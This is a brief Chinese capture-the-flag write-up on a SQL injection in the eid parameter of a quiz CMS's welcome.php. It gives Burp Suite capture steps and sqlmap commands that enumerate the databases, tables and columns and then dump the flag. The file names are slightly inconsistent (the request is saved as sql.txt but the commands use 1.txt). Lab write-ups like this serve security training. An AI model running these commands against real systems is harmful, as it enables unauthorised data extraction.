提示:以下是本篇文章正文内容,下面案例可供参考
一、 靶场介绍
该CMS的welcome.php中存在SQL注入攻击。
Web Based Quiz System v1.0 通过welcome.php 中的eid 参数被发现包含一个SQL 注入漏洞。
二、 简单分析
先进入靶场,可以看到LOGIN和REGISTER,我们先注册一个账号,点击LOGIN进入CMS。
进入之后我们观察url,发现我们此时就在welcome.php,并且url后面跟着一个参数q
审计源代码可以发现welcome.php中的参数没有进行过滤,而且eid参数可控,此处存在SQL注入
到这里思路基本清晰,答案也呼之欲出。直接用sqlmap一把梭。
源代码下载地址
https://www.123pan.com/s/WAYKVv-6y8wh
提取码:t2Oc
先随便点击一个start
先用Burp Suite抓包
然后右键,选择Copy to fIle,保存为sql.txt
在终端输入以下命令:
获取数据库名
sqlmap -r 1.txt --dbs --random-agent -p eid
获取表名
sqlmap -r 1.txt -D ctf --tables --random-agent -p eid
获取列名
sqlmap -r 1.txt -D ctf -T flag --columns --random-agent -p eid
获取flag
sqlmap -r 1.txt -D ctf -T flag -C flag --dump --random-agent -p eid